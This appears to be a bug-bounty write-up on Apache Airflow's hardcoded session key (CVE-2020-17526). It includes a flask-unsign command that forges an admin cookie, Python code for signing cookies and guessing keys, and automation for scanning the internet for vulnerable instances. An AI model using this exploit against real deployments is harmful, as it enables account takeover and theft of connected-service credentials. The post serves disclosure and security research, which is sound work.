Blast Radius: Apache Airflow Vulnerabilities
Apache Airflow is an open-source workflow management platform that started at Airbnb in 2014 as a way to manage complex workflows. It lets organizations programmatically author, schedule and monitor their workflows through a web-based interface, and it is typically connected to databases and many other systems.
Although it started at Airbnb, many organizations use Airflow today, most of them in the software and financial services industries and with revenues of over $100 million. It may look like just another harmless workflow platform, but because of its architecture and the number and size of the companies using it, Apache Airflow offers a wide attack surface, and vulnerabilities in it can lead to far from benign scenarios.
BlastRadius is a new series on our blog where security professionals, researchers and experts will deep dive into different attacks and vulnerabilities and explore how they can impact the whole internet ecosystem and what it means for organizations of all sizes, across all industries. In the first part of our BlastRadius series, we are joined by Ian Carroll.
Security researcher Ian Carroll ran into an Airflow instance exposed to the internet during recon on a bug bounty program, which piqued his interest in investigating its security further. He will go over finding older vulnerabilities in Airflow, exploiting and automating critical issues in it and, finally, how to find affected companies and what impact these CVEs have on them.
- Understanding the Apache Airflow Vulnerabilities
- Finding older vulnerabilities
- Exploiting CVE-2020-17526
- Finding affected companies
- Impact to affected companies
Understanding the Apache Airflow Vulnerabilities
Earlier this year, I stumbled upon an Apache Airflow instance's web interface when looking through public assets on a bug bounty program. While it was behind authentication, I got curious and started looking into its security and past vulnerabilities, to see if it might be an interesting target. I quickly realized that not only did it have several prior security vulnerabilities, but that it was often connected to numerous systems within a company — a great target to easily cause a lot of damage. I was able to exploit these issues in over ten bug bounty programs, earning many P1s and over $13,000.
Finding older vulnerabilities
Faced with the Airflow login page on this target and never having seen it before, I decided to go dig through old CVEs on Snyk. I was surprised to find quite a few, most of which were in its web interface. However, I had no idea what version of Airflow my target was using, and many seemed to require me to already have logged in to the instance. Since I had no access at this point, I kept looking until I noticed a curious entry from December of 2020, rated as "medium" by Snyk:
Given a default config, it allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
This is a weird way to phrase this issue, as it seems to imply something quite severe — the authentication system for a default Airflow instance is able to generate valid sessions for any other Airflow instance. This must mean that we can log into any instance that didn't change an otherwise obscure configuration value. Contrary to its CVSS rating, this is likely a critical vulnerability!
Exploiting CVE-2020-17526
Looking through the Apache Airflow project, I noticed a pull request that changed the secret_key configuration setting mentioned in the advisory. It used to be a hardcoded value of temporary_key, and was moved to a random value around when the advisory was released. So it seems we know the session secret for most Airflow instances was accidentally hardcoded to temporary_key, but what does this mean for exploiting it?
This seemed like a classic stateless session implementation, like a JSON Web Token (JWT), where the session state is not stored on the server. Instead, the session state is encoded and stored inside a cookie, and is then cryptographically signed to ensure it cannot be tampered with. There are good reasons to implement an authentication and session system like this: when running multiple Airflow servers behind a load balancer, they must all know about your session and that you are logged in. As a result, Airflow either had to require its users to install a data store like Redis to store session data, or it had to make them stateless. Unfortunately, this design critically hinges on the key being unguessable and private — and here, it is hardcoded to the same public value for everyone.
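To make the risk concrete, here is a minimal sketch of a stateless signed session using only the Python standard library. It is a generic illustration, not Airflow's or Flask's actual cookie format; the function names and the "Site B" framing are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import json

# The old default named in the advisory; every instance that never
# overrode it shares this value.
SHARED_DEFAULT_KEY = b"temporary_key"


def sign_session(session: dict, key: bytes) -> str:
    """Encode the session and append an HMAC so tampering can be detected."""
    payload = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode())
    mac = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + mac


def load_session(cookie: str, key: bytes):
    """Return the session dict if the signature checks out, else None."""
    payload, _, mac = cookie.rpartition(".")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))


# "Site B" never issued this cookie, yet accepts it because it uses the same key.
forged = sign_session({"user_id": "1"}, SHARED_DEFAULT_KEY)
site_b_view = load_session(forged, SHARED_DEFAULT_KEY)

# An instance with its own random key rejects the very same cookie.
patched_view = load_session(forged, b"a-long-random-per-instance-key")
```

The server keeps no session state at all, so the signature is the only thing standing between an anonymous visitor and an authenticated session.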
After digging into the Airflow authentication system, which is built on Flask, I saw it was reliant on the session's user_id value to determine whether we are logged in. If we can change this session value to the user ID of our choice, we can mark ourselves as authenticated within Airflow and become an administrator with almost no effort!
I mentioned JWTs earlier, but this is a slightly different system than a standard JWT. Flask uses its own signed cookie format (built on the itsdangerous library) that can compress the session data in order to save bandwidth for the application's users. As a result, we can't just go and use standard JWT tools for this; we'll need to find a tool to modify Flask-specific session cookies. Luckily, Paradoxis wrote a Python tool called flask-unsign which is meant for exactly this use case. We can pass it a new, modified session object and have it sign it with the known session key.
And with this, we have a valid session cookie for user ID #1, who is almost always the first admin of the instance:
% flask-unsign -s --secret "temporary_key" -c "{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"
<an admin cookie!>
Incidentally, flask-unsign did not have temporary_key on its default wordlist, so it did not find this issue out of the box. I submitted a pull request, and now it can find this vulnerability via brute-force just by passing it an Airflow cookie with the "unsign" option!
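The wordlist check is conceptually simple. The sketch below reimplements it with the standard library, based on my understanding of the layout Flask's default session cookies use (payload.timestamp.signature, HMAC-SHA1, with a key derived from the secret and the salt "cookie-session"). It is not flask-unsign's code, the helper names are hypothetical, and for real testing the tool itself is the better choice.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64(data: bytes) -> bytes:
    """URL-safe base64 without padding, as used in the cookie segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _signature(secret: str, signed_part: bytes) -> bytes:
    # Assumed scheme: derived key = HMAC-SHA1(secret, salt), then
    # signature = HMAC-SHA1(derived key, "payload.timestamp").
    derived = hmac.new(secret.encode(), b"cookie-session", hashlib.sha1).digest()
    return _b64(hmac.new(derived, signed_part, hashlib.sha1).digest())


def sign_cookie(session: dict, secret: str) -> str:
    """Build an uncompressed payload.timestamp.signature cookie."""
    payload = _b64(json.dumps(session, separators=(",", ":")).encode())
    timestamp = _b64(int(time.time()).to_bytes(4, "big"))
    signed_part = payload + b"." + timestamp
    return (signed_part + b"." + _signature(secret, signed_part)).decode()


def guess_secret(cookie: str, wordlist):
    """Return the first candidate whose signature matches the cookie, or None."""
    signed_part, _, sig = cookie.encode().rpartition(b".")
    for candidate in wordlist:
        if hmac.compare_digest(_signature(candidate, signed_part), sig):
            return candidate
    return None


# Sign a cookie locally, then recover the key from a small wordlist.
cookie = sign_cookie({"user_id": "1"}, "temporary_key")
found = guess_secret(cookie, ["secret", "changeme", "temporary_key"])
```

Because the signature covers everything before the final dot, the guessing step never needs to decode or decompress the payload; it only recomputes one HMAC per candidate.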
Finding affected companies
After I found this vulnerability for the first time, I was very interested in finding other affected instances. One of the first things I did was use the SecurityTrails SurfaceBrowser's SQL Explorer interface to find subdomains that contained the word "airflow", which yielded a lot of instances exposed to the internet.
Since we can test for this vulnerability simply based on the response cookies from a simple GET request to the Airflow homepage, I was able to take those SQL results and test those instances on the internet without ever logging in, and I sent several disclosure emails to companies that didn't seem to operate a bug bounty program. Some companies ignored my outreach, but others were thankful for the notice despite not running a disclosure program.
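As a rough sketch of that first step, the snippet below pulls a session cookie out of the Set-Cookie header values of a response and applies a cheap shape check before any key guessing. The cookie name "session" is Flask's default and is an assumption here, as are the function names; fetching the response itself is left to whatever HTTP client the scanner already uses.

```python
from http.cookies import SimpleCookie


def extract_session_cookie(set_cookie_headers, name="session"):
    """Return the value of the named cookie from Set-Cookie header values, or None."""
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        if name in jar:
            return jar[name].value
    return None


def looks_like_signed_cookie(value: str) -> bool:
    """Pre-filter: three non-empty dot-separated parts, optionally after a leading dot."""
    parts = value.lstrip(".").split(".")
    return len(parts) == 3 and all(parts)
```

Only cookies that pass the shape check need to be handed to the more expensive signature test.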
However, I wanted to focus on companies that operate bug bounty programs, as I can go deeper on their recon and yield better results. I have an automation framework that pulls in asset discovery data from SecurityTrails and other recon data sources for bug bounty programs I've been invited to. This allows me to comprehensively scan these assets over HTTP; for instance, like many others I scan for subdomain takeover issues by looking for common error pages on the homepage. When my tool finds one, it sends me an alert on my phone so I can claim the subdomain and report the issue.
I decided to simply bake flask-unsign into my automation, and have it run on every suspicious-looking cookie I received when I was scanning HTTP assets. This worked and it immediately found a few different companies that were vulnerable to this issue, although I had to work through exploiting a company that had implemented their own authentication layer on top of Airflow, which ended up still being vulnerable to this bug.
Eventually, it became unsustainable to run flask-unsign on every cookie, as it takes a lot of CPU resources to guess the key for the cookie. I pivoted to storing these cookies in a database and running flask-unsign on them asynchronously, which allowed me to speed up my crawling.
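One way to decouple crawling from key guessing is a small queue table. The sketch below uses SQLite for illustration; the schema, the function names and the crack callback are all hypothetical, and my actual automation may differ in the details.

```python
import sqlite3


def open_queue(path=":memory:"):
    """Create (or open) the cookie queue."""
    db = sqlite3.connect(path)
    db.execute(
        "CREATE TABLE IF NOT EXISTS cookies ("
        " host TEXT, cookie TEXT, secret TEXT, checked INTEGER DEFAULT 0,"
        " UNIQUE(host, cookie))"
    )
    return db


def enqueue(db, host, cookie):
    """Called by the crawler: a cheap insert, no key guessing on the hot path."""
    db.execute(
        "INSERT OR IGNORE INTO cookies (host, cookie) VALUES (?, ?)", (host, cookie)
    )
    db.commit()


def process_pending(db, crack):
    """Called by a separate worker: run the expensive check on unchecked rows."""
    rows = db.execute(
        "SELECT rowid, host, cookie FROM cookies WHERE checked = 0"
    ).fetchall()
    hits = []
    for rowid, host, cookie in rows:
        secret = crack(cookie)  # expected to return the key, or None on failure
        db.execute(
            "UPDATE cookies SET checked = 1, secret = ? WHERE rowid = ?",
            (secret, rowid),
        )
        if secret is not None:
            hits.append((host, secret))
    db.commit()
    return hits
```

The crawler only ever calls enqueue, so its speed no longer depends on how long the wordlist is; the worker can run process_pending on its own schedule with any callable that wraps the key-guessing tool.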
However, since nearly every company I found hadn't updated Airflow, I decided to also write a simple rule to catch the distinctive Airflow 404 page. My automation would make a request to a path that I knew didn't exist on Airflow, and if it returned the Airflow 404 page, I would know the instance could be vulnerable, and manually take a look at it. While this doesn't directly tell us that it's vulnerable, this is a critical issue, so it's worth the time investment to manually take a look.
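A rule like this can be very small. In the sketch below the marker string is a placeholder that should be replaced with text copied from a real Airflow 404 page, and the function names are hypothetical; the HTTP request itself is left to the scanner.

```python
import uuid

# Placeholder: replace with a string copied from a real Airflow 404 page.
AIRFLOW_404_MARKER = "Airflow 404"


def probe_path() -> str:
    """A random path that should not exist on any instance."""
    return "/" + uuid.uuid4().hex


def is_airflow_404(status: int, body: str, marker: str = AIRFLOW_404_MARKER) -> bool:
    """Flag a response for manual review if it looks like Airflow's 404 page."""
    return status == 404 and marker.lower() in body.lower()
```

A match only says that the host is probably running Airflow, so it queues the host for a manual look rather than reporting it as vulnerable.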
Impact to affected companies
Once you have logged into the Airflow instance's web interface, it is almost always a goldmine of impact. As I mentioned earlier, Airflow's design is to interconnect with as many systems as possible, to read and write data from them as it's transformed and modified. As a result, it is typically configured with privileged access to many services that a company is working with.
When I successfully used this vulnerability on my first target, I got access to credentials for AWS, Stripe, Braintree, Datadog, and more. There are a few places you will commonly find impact within the Airflow interface that will show us its blast radius:
- Light damage: You can view the source code of Airflow jobs (called DAGs), which might contain hardcoded credentials or internal information.
- Moderate damage: You can view and change the configuration variables for the Airflow instance. While credentials are supposed to be redacted in the UI, they are often misconfigured and displayed in plaintext, giving you API keys and other secret values.
- Severe damage: On older versions, you can use the "ad-hoc query" interface to issue arbitrary queries to connected data sources. While I've not tried to escalate this myself, I believe this equates to intentional SQL injection, which would be an amazing attack on a production database.

In total from exploiting this issue, I made over $13,000 and counting via public and private bug bounty programs, with almost everyone immediately triaging it as a critical issue.
